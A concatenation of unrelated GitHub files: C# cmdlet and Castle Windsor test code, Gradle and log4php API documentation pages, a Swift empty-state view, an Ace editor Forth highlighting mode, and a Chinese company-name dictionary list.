build edition" #endif } catch (AmazonServiceException exc) { var webException = exc.InnerException as System.Net.WebException; if (webException != null) { throw new Exception(Utils.Common.FormatNameResolutionFailureMessage(client.Config, webException.Message), webException); } throw; } } #endregion internal partial class CmdletContext : ExecutorContext { public System.String TransformJobName { get; set; } public System.Func<Amazon.SageMaker.Model.DescribeTransformJobResponse, GetSMTransformJobCmdlet, object> Select { get; set; } = (response, cmdlet) => response; } } }
{ "pile_set_name": "Github" }
// Copyright 2004-2011 Castle Project - http://www.castleproject.org/ // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. namespace Castle.Windsor.Tests.Facilities.Startable { using Castle.Facilities.Startable; using Castle.MicroKernel.Handlers; using Castle.MicroKernel.Registration; using Castle.MicroKernel.SubSystems.Configuration; using CastleTests.Components; using NUnit.Framework; [TestFixture] public class StartableAndDecoratorsTestCase { private class AllInstaller : IWindsorInstaller { public void Install(IWindsorContainer container, IConfigurationStore store) { container.Register(Component.For<IEmptyService>().ImplementedBy<EmptyServiceDecorator>(), Component.For<IEmptyService>().ImplementedBy<EmptyServiceA>()); container.Register(Component.For<UsesIEmptyService>().Start()); } } private class DependenciesInstaller : IWindsorInstaller { public void Install(IWindsorContainer container, IConfigurationStore store) { container.Register(Component.For<IEmptyService>().ImplementedBy<EmptyServiceDecorator>(), Component.For<IEmptyService>().ImplementedBy<EmptyServiceA>()); } } private class StartableInstaller : IWindsorInstaller { public void Install(IWindsorContainer container, IConfigurationStore store) { container.Register(Component.For<UsesIEmptyService>().Start()); } } [Test] public void No_startable_explicit_Resolve_resolves_with_no_issues() { using (var container = new WindsorContainer()) { container.AddFacility<StartableFacility>(f => f.DeferredStart()); container.Register( Component.For<IEmptyService>().ImplementedBy<EmptyServiceDecorator>(), Component.For<IEmptyService>().ImplementedBy<EmptyServiceA>(), Component.For<UsesIEmptyService>() ); container.Resolve<UsesIEmptyService>(); } } [Test] public void Startable_and_components_in_separate_Install_Resolve_Startable_last_works() { using (var container = new WindsorContainer()) { container.AddFacility<StartableFacility>(f => f.DeferredStart()); container.Install(new DependenciesInstaller()); container.Register(Component.For<UsesIEmptyService>().Start()); } } [Test] public void Startable_and_components_in_separate_Install_Startable_first_throws() { using (var container = new WindsorContainer()) { container.AddFacility<StartableFacility>(f => f.DeferredStart()); Assert.Throws<HandlerException>(() => { container.Install(new StartableInstaller()); container.Install(new DependenciesInstaller()); }); } } [Test] public void Startable_and_components_in_separate_Install_Startable_last_works() { using (var container = new WindsorContainer()) { container.AddFacility<StartableFacility>(f => f.DeferredStart()); container.Install(new DependenciesInstaller()); container.Install(new StartableInstaller()); } } [Test] public void Startable_and_components_in_single_Install_works() { using (var container = new WindsorContainer()) { container.AddFacility<StartableFacility>(f => f.DeferredStart()); container.Install(new DependenciesInstaller(), new StartableInstaller()); } } [Test] public void Startable_and_components_in_single_Installer_works() { using (var container = new WindsorContainer()) { container.AddFacility<StartableFacility>(f => f.DeferredStart()); container.Install(new AllInstaller()); } } [Test] public void Startable_and_components_in_single_Register_works() { using (var container = new WindsorContainer()) { container.AddFacility<StartableFacility>(f => f.DeferredStart()); container.Register( Component.For<IEmptyService>().ImplementedBy<EmptyServiceDecorator>(), Component.For<IEmptyService>().ImplementedBy<EmptyServiceA>(), Component.For<UsesIEmptyService>().Start() ); } } [Test] public void Startable_and_components_separate_Register_Startable_first_throws() { using (var container = new WindsorContainer()) { container.AddFacility<StartableFacility>(f => f.DeferredStart()); Assert.Throws<HandlerException>(() => { container.Register(Component.For<UsesIEmptyService>().Start()); container.Register(Component.For<IEmptyService>().ImplementedBy<EmptyServiceDecorator>(), Component.For<IEmptyService>().ImplementedBy<EmptyServiceA>()); }); } } [Test] public void Startable_and_components_separate_Register_Startable_last_works() { using (var container = new WindsorContainer()) { container.AddFacility<StartableFacility>(f => f.DeferredStart()); container.Register(Component.For<IEmptyService>().ImplementedBy<EmptyServiceDecorator>(), Component.For<IEmptyService>().ImplementedBy<EmptyServiceA>()); container.Register(Component.For<UsesIEmptyService>().Start()); } } } }
{ "pile_set_name": "Github" }
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- **************************************************************** --> <!-- * PLEASE KEEP COMPLICATED EXPRESSIONS OUT OF THESE TEMPLATES, * --> <!-- * i.e. only iterate & print data where possible. Thanks, Jez. * --> <!-- **************************************************************** --> <html> <head> <!-- Generated by groovydoc (2.3.3) on Tue Jul 01 09:50:59 CEST 2014 --> <title>OsgiPluginConvention (Gradle API 2.0)</title> <meta name="date" content="2014-07-01"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link href="../../../../../groovy.ico" type="image/x-icon" rel="shortcut icon"> <link href="../../../../../groovy.ico" type="image/x-icon" rel="icon"> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> <body class="center"> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="OsgiPluginConvention (Gradle API 2.0)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-all.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <div> <ul class="navList"> <li><a href="../../../../../index.html?org/gradle/api/plugins/osgi/OsgiPluginConvention" target="_top">Frames</a></li> <li><a href="OsgiPluginConvention.html" target="_top">No Frames</a></li> </ul> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> Nested&nbsp;&nbsp;&nbsp;Field&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<li><a href="#constructor_summary">Constructor</a></li>&nbsp;&nbsp;&nbsp;<li><a href="#method_summary">Method</a></li>&nbsp;&nbsp;&nbsp; </ul> <ul class="subNavList"> <li>&nbsp;|&nbsp;Detail:&nbsp;</li> Field&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<li><a href="#constructor_detail">Constructor</a></li>&nbsp;&nbsp;&nbsp;<li><a href="#method_detail">Method</a></li>&nbsp;&nbsp;&nbsp; </ul> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">Package: <strong>org.gradle.api.plugins.osgi</strong></div> <h2 title="[Java] Class OsgiPluginConvention" class="title">[Java] Class OsgiPluginConvention</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li><ul class="inheritance"></ul></li><li>org.gradle.api.plugins.osgi.OsgiPluginConvention </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <p> Is mixed in into the project when applying the <a href='../../../../../org/gradle/api/plugins/osgi/OsgiPlugin.html' title='OsgiPlugin'>OsgiPlugin</a> . </p> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- =========== NESTED CLASS SUMMARY =========== --> <!-- =========== ENUM CONSTANT SUMMARY =========== --> <!-- =========== FIELD SUMMARY =========== --> <!-- =========== PROPERTY SUMMARY =========== --> <!-- =========== ELEMENT SUMMARY =========== --> <!-- ======== CONSTRUCTOR SUMMARY ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor_summary"><!-- --></a> <h3>Constructor Summary</h3> <ul class="blockList"> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructors Summary table"> <caption><span>Constructors</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Constructor and description</th> </tr> <tr class="altColor"> <td class="colFirst"> <code><a href="#OsgiPluginConvention(ProjectInternal)">OsgiPluginConvention</a></strong> (<a href='../../../../../ProjectInternal.html'>ProjectInternal</a> project)</code><br></td> </tr> </table> </ul> </li> </ul> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method_summary"><!-- --></a> <h3>Methods Summary</h3> <ul class="blockList"> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Methods Summary table"> <caption><span>Methods</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Type</th> <th class="colLast" scope="col">Name and description</th> </tr> <tr class="altColor"> <td class="colFirst"><code><a href='../../../../../org/gradle/api/plugins/osgi/OsgiManifest.html'>OsgiManifest</a></strong></code></td> <td class="colLast"><code><strong><a href="#osgiManifest()">osgiManifest</a></strong>()</code><br>Creates a new instance of <a href='../../../../../org/gradle/api/plugins/osgi/OsgiManifest.html' title='OsgiManifest'>OsgiManifest</a>. </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href='../../../../../org/gradle/api/plugins/osgi/OsgiManifest.html'>OsgiManifest</a></strong></code></td> <td class="colLast"><code><strong><a href="#osgiManifest(groovy.lang.Closure)">osgiManifest</a></strong>(<a href='http://groovy.codehaus.org/gapi/groovy/lang/Closure.html' title='Closure'>Closure</a> closure)</code><br>Creates and configures a new instance of an <a href='../../../../../org/gradle/api/plugins/osgi/OsgiManifest.html' title='OsgiManifest'>OsgiManifest</a> . </td> </tr> </table> </ul> </li> <li class="blockList"><a name="method_summary"><!-- --></a> <h3>Inherited Methods Summary</h3> <ul class="blockList"> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Inherited Methods Summary table"> <caption><span>Inherited Methods</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Methods inherited from class</th> <th class="colLast" scope="col">Name</th> </tr> <tr class="altColor"> <td class="colFirst"><code>class <a href='http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html' title='Object'>Object</a></strong></code></td> <td class="colLast"><code><a href='http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html#wait(long, int)' title='wait'>wait</a>, <a href='http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html#wait(long)' title='wait'>wait</a>, <a href='http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html#wait()' title='wait'>wait</a>, <a href='http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html#equals(java.lang.Object)' title='equals'>equals</a>, <a href='http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html#toString()' title='toString'>toString</a>, <a href='http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html#hashCode()' title='hashCode'>hashCode</a>, <a href='http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html#getClass()' title='getClass'>getClass</a>, <a href='http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html#notify()' title='notify'>notify</a>, <a href='http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Object.html#notifyAll()' title='notifyAll'>notifyAll</a></code></td> </tr> </table> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- =========== CONSTRUCTOR DETAIL =========== --> <ul class="blockList"> <li class="blockList"><a name="constructor_detail"> <!-- --> </a> <h3>Constructor Detail</h3> <a name="OsgiPluginConvention(ProjectInternal)"><!-- --></a> <ul class="blockListLast"> <li class="blockList"> <h4>public&nbsp;<strong>OsgiPluginConvention</strong>(<a href='../../../../../ProjectInternal.html'>ProjectInternal</a> project)</h4> <p></p> </li> </ul> </li> </ul> <!-- =========== METHOD DETAIL =========== --> <ul class="blockList"> <li class="blockList"><a name="method_detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="osgiManifest()"><!-- --></a> <ul class="blockListLast"> <li class="blockList"> <h4>public&nbsp;<a href='../../../../../org/gradle/api/plugins/osgi/OsgiManifest.html'>OsgiManifest</a> <strong>osgiManifest</strong>()</h4> <p> Creates a new instance of <a href='../../../../../org/gradle/api/plugins/osgi/OsgiManifest.html' title='OsgiManifest'>OsgiManifest</a>. The returned object is preconfigured with: <pre> version: project.version name: project.archivesBaseName symbolicName: project.group + "." + project.archivesBaseName (see below for exceptions to this rule) </pre> The symbolic name is usually the group + "." + archivesBaseName, with the following exceptions <ul> <li>if group has only one section (no dots) and archivesBaseName is not null then the first package name with classes is returned. eg. commons-logging:commons-logging -> org.apache.commons.logging</li> <li>if archivesBaseName is equal to last section of group then group is returned. eg. org.gradle:gradle -> org.gradle</li> <li>if archivesBaseName starts with last section of group that portion is removed. eg. org.gradle:gradle-core -> org.gradle.core</li> </ul> </p> </li> </ul> <a name="osgiManifest(groovy.lang.Closure)"><!-- --></a> <ul class="blockListLast"> <li class="blockList"> <h4>public&nbsp;<a href='../../../../../org/gradle/api/plugins/osgi/OsgiManifest.html'>OsgiManifest</a> <strong>osgiManifest</strong>(<a href='http://groovy.codehaus.org/gapi/groovy/lang/Closure.html' title='Closure'>Closure</a> closure)</h4> <p> Creates and configures a new instance of an <a href='../../../../../org/gradle/api/plugins/osgi/OsgiManifest.html' title='OsgiManifest'>OsgiManifest</a> . The closure configures the new manifest instance before it is returned. </p> </li> </ul> </li> </ul> </li> </ul> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-all.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <div> <ul class="navList"> <li><a href="../../../../../index.html?org/gradle/api/plugins/osgi/OsgiPluginConvention" target="_top">Frames</a></li> <li><a href="OsgiPluginConvention.html" target="_top">No Frames</a></li> </ul> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> Nested&nbsp;&nbsp;&nbsp;Field&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<li><a href="#constructor_summary">Constructor</a></li>&nbsp;&nbsp;&nbsp;<li><a href="#method_summary">Method</a></li>&nbsp;&nbsp;&nbsp; </ul> <ul class="subNavList"> <li>&nbsp;|&nbsp;Detail:&nbsp;</li> Field&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<li><a href="#constructor_detail">Constructor</a></li>&nbsp;&nbsp;&nbsp;<li><a href="#method_detail">Method</a></li>&nbsp;&nbsp;&nbsp; </ul> </div> <p>Gradle API 2.0</p> <a name="skip-navbar_bottom"> <!-- --> </a> </div> </div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
{ "pile_set_name": "Github" }
// // EmptyStateView.swift // WLEmptyState // // Created by Jorge Ovalle on 12/6/18. // Copyright © 2018 Wizeline. All rights reserved. // import Foundation import UIKit final class EmptyStateView: UIView { private lazy var stackView: UIStackView = { let stackView = UIStackView(arrangedSubviews: [imageContainer, titleLabel, descriptionLabel]) stackView.translatesAutoresizingMaskIntoConstraints = false stackView.axis = .vertical stackView.alignment = .fill stackView.spacing = 10 stackView.distribution = .fill return stackView }() private lazy var imageContainer: UIView = { let view = UIView() view.addSubview(imageView) NSLayoutConstraint.activate([ imageView.widthAnchor.constraint(equalToConstant: 80), imageView.heightAnchor.constraint(equalToConstant: 80), imageView.centerYAnchor.constraint(equalTo: view.centerYAnchor), imageView.centerXAnchor.constraint(equalTo: view.centerXAnchor), view.heightAnchor.constraint(equalTo: imageView.heightAnchor)]) return view }() private lazy var imageView: UIImageView = { let imageView = UIImageView() imageView.translatesAutoresizingMaskIntoConstraints = false return imageView }() lazy var titleLabel: UILabel = { let label = UILabel(frame: .zero) label.backgroundColor = .white label.textAlignment = .center return label }() lazy var descriptionLabel: UILabel = { let label = UILabel(frame: .zero) label.backgroundColor = .white label.numberOfLines = 0 label.textAlignment = .center return label }() override public func layoutSubviews() { super.layoutSubviews() stackView.frame = bounds } private lazy var containerView: UIView = { let containerView = UIView(frame: .zero) containerView.translatesAutoresizingMaskIntoConstraints = false return containerView }() var image: UIImage? { didSet { self.imageView.image = image } } override public init(frame: CGRect) { super.init(frame: frame) backgroundColor = .white addSubview(containerView) containerView.addSubview(stackView) NSLayoutConstraint.activate([ containerView.widthAnchor.constraint(equalTo: stackView.widthAnchor), containerView.heightAnchor.constraint(equalTo: stackView.heightAnchor), stackView.widthAnchor.constraint(equalTo: widthAnchor, multiplier: 0.8), stackView.centerXAnchor.constraint(equalTo: centerXAnchor), stackView.centerYAnchor.constraint(equalTo: centerYAnchor), containerView.centerXAnchor.constraint(equalTo: centerXAnchor), containerView.centerYAnchor.constraint(equalTo: centerYAnchor)]) } override public func didMoveToSuperview() { super.didMoveToSuperview() self.frame = self.superview?.bounds ?? .zero } @available(*, unavailable) required init?(coder aDecoder: NSCoder) { fatalError("init(coder:) has not been implemented") } enum DefaultConstants { static let image = "Empty" static let title = "Empty DataSet" static let description = "Oops There's no data." } }
{ "pile_set_name": "Github" }
define("ace/mode/forth_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/text_highlight_rules"], function(require, exports, module) { "use strict"; var oop = require("../lib/oop"); var TextHighlightRules = require("./text_highlight_rules").TextHighlightRules; var ForthHighlightRules = function() { this.$rules = { start: [ { include: '#forth' } ], '#comment': [ { token: 'comment.line.double-dash.forth', regex: '(?:^|\\s)--\\s.*$', comment: 'line comments for iForth' }, { token: 'comment.line.backslash.forth', regex: '(?:^|\\s)\\\\[\\s\\S]*$', comment: 'ANSI line comment' }, { token: 'comment.line.backslash-g.forth', regex: '(?:^|\\s)\\\\[Gg] .*$', comment: 'gForth line comment' }, { token: 'comment.block.forth', regex: '(?:^|\\s)\\(\\*(?=\\s|$)', push: [ { token: 'comment.block.forth', regex: '(?:^|\\s)\\*\\)(?=\\s|$)', next: 'pop' }, { defaultToken: 'comment.block.forth' } ], comment: 'multiline comments for iForth' }, { token: 'comment.block.documentation.forth', regex: '\\bDOC\\b', caseInsensitive: true, push: [ { token: 'comment.block.documentation.forth', regex: '\\bENDDOC\\b', caseInsensitive: true, next: 'pop' }, { defaultToken: 'comment.block.documentation.forth' } ], comment: 'documentation comments for iForth' }, { token: 'comment.line.parentheses.forth', regex: '(?:^|\\s)\\.?\\( [^)]*\\)', comment: 'ANSI line comment' } ], '#constant': [ { token: 'constant.language.forth', regex: '(?:^|\\s)(?:TRUE|FALSE|BL|PI|CELL|C/L|R/O|W/O|R/W)(?=\\s|$)', caseInsensitive: true}, { token: 'constant.numeric.forth', regex: '(?:^|\\s)[$#%]?[-+]?[0-9]+(?:\\.[0-9]*e-?[0-9]+|\\.?[0-9a-fA-F]*)(?=\\s|$)'}, { token: 'constant.character.forth', regex: '(?:^|\\s)(?:[&^]\\S|(?:"|\')\\S(?:"|\'))(?=\\s|$)'}], '#forth': [ { include: '#constant' }, { include: '#comment' }, { include: '#string' }, { include: '#word' }, { include: '#variable' }, { include: '#storage' }, { include: '#word-def' } ], '#storage': [ { token: 'storage.type.forth', regex: '(?:^|\\s)(?:2CONSTANT|2VARIABLE|ALIAS|CONSTANT|CREATE-INTERPRET/COMPILE[:]?|CREATE|DEFER|FCONSTANT|FIELD|FVARIABLE|USER|VALUE|VARIABLE|VOCABULARY)(?=\\s|$)', caseInsensitive: true}], '#string': [ { token: 'string.quoted.double.forth', regex: '(ABORT" |BREAK" |\\." |C" |0"|S\\\\?" )([^"]+")', caseInsensitive: true}, { token: 'string.unquoted.forth', regex: '(?:INCLUDE|NEEDS|REQUIRE|USE)[ ]\\S+(?=\\s|$)', caseInsensitive: true}], '#variable': [ { token: 'variable.language.forth', regex: '\\b(?:I|J)\\b', caseInsensitive: true } ], '#word': [ { token: 'keyword.control.immediate.forth', regex: '(?:^|\\s)\\[(?:\\?DO|\\+LOOP|AGAIN|BEGIN|DEFINED|DO|ELSE|ENDIF|FOR|IF|IFDEF|IFUNDEF|LOOP|NEXT|REPEAT|THEN|UNTIL|WHILE)\\](?=\\s|$)', caseInsensitive: true}, { token: 'keyword.other.immediate.forth', regex: '(?:^|\\s)(?:COMPILE-ONLY|IMMEDIATE|IS|RESTRICT|TO|WHAT\'S|])(?=\\s|$)', caseInsensitive: true}, { token: 'keyword.control.compile-only.forth', regex: '(?:^|\\s)(?:-DO|\\-LOOP|\\?DO|\\?LEAVE|\\+DO|\\+LOOP|ABORT\\"|AGAIN|AHEAD|BEGIN|CASE|DO|ELSE|ENDCASE|ENDIF|ENDOF|ENDTRY\\-IFERROR|ENDTRY|FOR|IF|IFERROR|LEAVE|LOOP|NEXT|RECOVER|REPEAT|RESTORE|THEN|TRY|U\\-DO|U\\+DO|UNTIL|WHILE)(?=\\s|$)', caseInsensitive: true}, { token: 'keyword.other.compile-only.forth', regex: '(?:^|\\s)(?:\\?DUP-0=-IF|\\?DUP-IF|\\)|\\[|\\[\'\\]|\\[CHAR\\]|\\[COMPILE\\]|\\[IS\\]|\\[TO\\]|<COMPILATION|<INTERPRETATION|ASSERT\\(|ASSERT0\\(|ASSERT1\\(|ASSERT2\\(|ASSERT3\\(|COMPILATION>|DEFERS|DOES>|INTERPRETATION>|OF|POSTPONE)(?=\\s|$)', caseInsensitive: true}, { token: 'keyword.other.non-immediate.forth', regex: '(?:^|\\s)(?:\'|<IS>|<TO>|CHAR|END-STRUCT|INCLUDE[D]?|LOAD|NEEDS|REQUIRE[D]?|REVISION|SEE|STRUCT|THRU|USE)(?=\\s|$)', caseInsensitive: true}, { token: 'keyword.other.warning.forth', regex: '(?:^|\\s)(?:~~|BREAK:|BREAK"|DBG)(?=\\s|$)', caseInsensitive: true}], '#word-def': [ { token: [ 'keyword.other.compile-only.forth', 'keyword.other.compile-only.forth', 'meta.block.forth', 'entity.name.function.forth' ], regex: '(:NONAME)|(^:|\\s:)(\\s)(\\S+)(?=\\s|$)', caseInsensitive: true, push: [ { token: 'keyword.other.compile-only.forth', regex: ';(?:CODE)?', caseInsensitive: true, next: 'pop' }, { include: '#constant' }, { include: '#comment' }, { include: '#string' }, { include: '#word' }, { include: '#variable' }, { include: '#storage' }, { defaultToken: 'meta.block.forth' } ] } ] }; this.normalizeRules(); }; ForthHighlightRules.metaData = { fileTypes: [ 'frt', 'fs', 'ldr', 'fth', '4th' ], foldingStartMarker: '/\\*\\*|\\{\\s*$', foldingStopMarker: '\\*\\*/|^\\s*\\}', keyEquivalent: '^~F', name: 'Forth', scopeName: 'source.forth' }; oop.inherits(ForthHighlightRules, TextHighlightRules); exports.ForthHighlightRules = ForthHighlightRules; }); define("ace/mode/folding/cstyle",["require","exports","module","ace/lib/oop","ace/range","ace/mode/folding/fold_mode"], function(require, exports, module) { "use strict"; var oop = require("../../lib/oop"); var Range = require("../../range").Range; var BaseFoldMode = require("./fold_mode").FoldMode; var FoldMode = exports.FoldMode = function(commentRegex) { if (commentRegex) { this.foldingStartMarker = new RegExp( this.foldingStartMarker.source.replace(/\|[^|]*?$/, "|" + commentRegex.start) ); this.foldingStopMarker = new RegExp( this.foldingStopMarker.source.replace(/\|[^|]*?$/, "|" + commentRegex.end) ); } }; oop.inherits(FoldMode, BaseFoldMode); (function() { this.foldingStartMarker = /([\{\[\(])[^\}\]\)]*$|^\s*(\/\*)/; this.foldingStopMarker = /^[^\[\{\(]*([\}\]\)])|^[\s\*]*(\*\/)/; this.singleLineBlockCommentRe= /^\s*(\/\*).*\*\/\s*$/; this.tripleStarBlockCommentRe = /^\s*(\/\*\*\*).*\*\/\s*$/; this.startRegionRe = /^\s*(\/\*|\/\/)#?region\b/; this._getFoldWidgetBase = this.getFoldWidget; this.getFoldWidget = function(session, foldStyle, row) { var line = session.getLine(row); if (this.singleLineBlockCommentRe.test(line)) { if (!this.startRegionRe.test(line) && !this.tripleStarBlockCommentRe.test(line)) return ""; } var fw = this._getFoldWidgetBase(session, foldStyle, row); if (!fw && this.startRegionRe.test(line)) return "start"; // lineCommentRegionStart return fw; }; this.getFoldWidgetRange = function(session, foldStyle, row, forceMultiline) { var line = session.getLine(row); if (this.startRegionRe.test(line)) return this.getCommentRegionBlock(session, line, row); var match = line.match(this.foldingStartMarker); if (match) { var i = match.index; if (match[1]) return this.openingBracketBlock(session, match[1], row, i); var range = session.getCommentFoldRange(row, i + match[0].length, 1); if (range && !range.isMultiLine()) { if (forceMultiline) { range = this.getSectionRange(session, row); } else if (foldStyle != "all") range = null; } return range; } if (foldStyle === "markbegin") return; var match = line.match(this.foldingStopMarker); if (match) { var i = match.index + match[0].length; if (match[1]) return this.closingBracketBlock(session, match[1], row, i); return session.getCommentFoldRange(row, i, -1); } }; this.getSectionRange = function(session, row) { var line = session.getLine(row); var startIndent = line.search(/\S/); var startRow = row; var startColumn = line.length; row = row + 1; var endRow = row; var maxRow = session.getLength(); while (++row < maxRow) { line = session.getLine(row); var indent = line.search(/\S/); if (indent === -1) continue; if (startIndent > indent) break; var subRange = this.getFoldWidgetRange(session, "all", row); if (subRange) { if (subRange.start.row <= startRow) { break; } else if (subRange.isMultiLine()) { row = subRange.end.row; } else if (startIndent == indent) { break; } } endRow = row; } return new Range(startRow, startColumn, endRow, session.getLine(endRow).length); }; this.getCommentRegionBlock = function(session, line, row) { var startColumn = line.search(/\s*$/); var maxRow = session.getLength(); var startRow = row; var re = /^\s*(?:\/\*|\/\/|--)#?(end)?region\b/; var depth = 1; while (++row < maxRow) { line = session.getLine(row); var m = re.exec(line); if (!m) continue; if (m[1]) depth--; else depth++; if (!depth) break; } var endRow = row; if (endRow > startRow) { return new Range(startRow, startColumn, endRow, line.length); } }; }).call(FoldMode.prototype); }); define("ace/mode/forth",["require","exports","module","ace/lib/oop","ace/mode/text","ace/mode/forth_highlight_rules","ace/mode/folding/cstyle"], function(require, exports, module) { "use strict"; var oop = require("../lib/oop"); var TextMode = require("./text").Mode; var ForthHighlightRules = require("./forth_highlight_rules").ForthHighlightRules; var FoldMode = require("./folding/cstyle").FoldMode; var Mode = function() { this.HighlightRules = ForthHighlightRules; this.foldingRules = new FoldMode(); this.$behaviour = this.$defaultBehaviour; }; oop.inherits(Mode, TextMode); (function() { this.lineCommentStart = "--"; this.blockComment = null; this.$id = "ace/mode/forth"; }).call(Mode.prototype); exports.Mode = Mode; });
{ "pile_set_name": "Github" }
央视/null 电信/null 移动/null 网通/null 联通/null 铁通/null 百度/null 环球网/null 长城网/null 新浪/null 腾讯/null 搜搜/soso 谷歌/null 雅虎/null 微软/null 中关村/null 搜狐/null 网易/null 硅谷/null 维基百科/null 巨人网络/null 阿里巴巴/null 阿里旺旺/旺旺 旺旺/null 淘宝/null 赶集网/null 猪八戒网/null 唯你英语/null 拉手网/null 百贯福泰/null 汇划算/null 汇划算网/null 聚划算/null 天猫/null 天猫网/null 亚马逊/null 亚马逊网/null 拍拍/null 拍拍网/null 京东/null 京东商城/null 返利网/null 支付宝/null 支付宝担保/null 支付宝及时到帐/null 支付宝双工能/null 财付通/null 财付通及时到帐/null 网银在线/null 苏宁易购/null 苏宁电器/null 仙童公司/null 开源中国/null 畅想网络/null 快乐大本营/null 越策越开心/null 超级男声/null 超男/null 超级女声/超女 超女/超级女声 好声音/null 快乐男声/快男 快男/快乐男声 快乐女声/null 快女/null 德克士/null 肯德基/null 奥利奥/null 回头客/null 苏波尔/null 苏宁/null 苏宁电器/null 苏宁易购/null 中央银行/null 人民银行/null 工商银行/null 农业银行/null 中国银行/null 建设银行/null 交通银行/null 华夏银行/null 光大银行/null 招商银行/null 中信银行/null 兴业银行/null 民生银行/null 深圳发展银行/null 广东发展银行/null 上海浦东发展银行/null 恒丰银行/null 农业发展银行/null 国家进出口信贷银行/null 国家开发银行/null 北京商业银行/null 上海银行/null 济南商业银行/null 信用社/null 农村信用社/null 邮政局/null 邮政储蓄银行/null
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- template designed by Marco Von Ballmoos --> <title>Docs for page LoggerDOMConfigurator.php</title> <link rel="stylesheet" href="../../media/stylesheet.css" /> <meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/> </head> <body> <div class="page-body"> <h2 class="file-name">/xml/LoggerDOMConfigurator.php</h2> <a name="sec-description"></a> <div class="info-box"> <div class="info-box-title">Description</div> <div class="nav-bar"> <span class="disabled">Description</span> | <a href="#sec-classes">Classes</a> | <a href="#sec-includes">Includes</a> | <a href="#sec-constants">Constants</a> </div> <div class="info-box-body"> <!-- ========== Info from phpDoc block ========= --> <p class="short-description">Copyright 2004 The Apache Software Foundation.</p> <p class="description"><p>This software is published under the terms of the Apache Software License version 2.0, a copy of which has been included with this distribution in the LICENSE file.</p></p> </div> </div> <a name="sec-classes"></a> <div class="info-box"> <div class="info-box-title">Classes</div> <div class="nav-bar"> <a href="#sec-description">Description</a> | <span class="disabled">Classes</span> | <a href="#sec-includes">Includes</a> | <a href="#sec-constants">Constants</a> </div> <div class="info-box-body"> <table cellpadding="2" cellspacing="0" class="class-table"> <tr> <th class="class-table-header">Class</th> <th 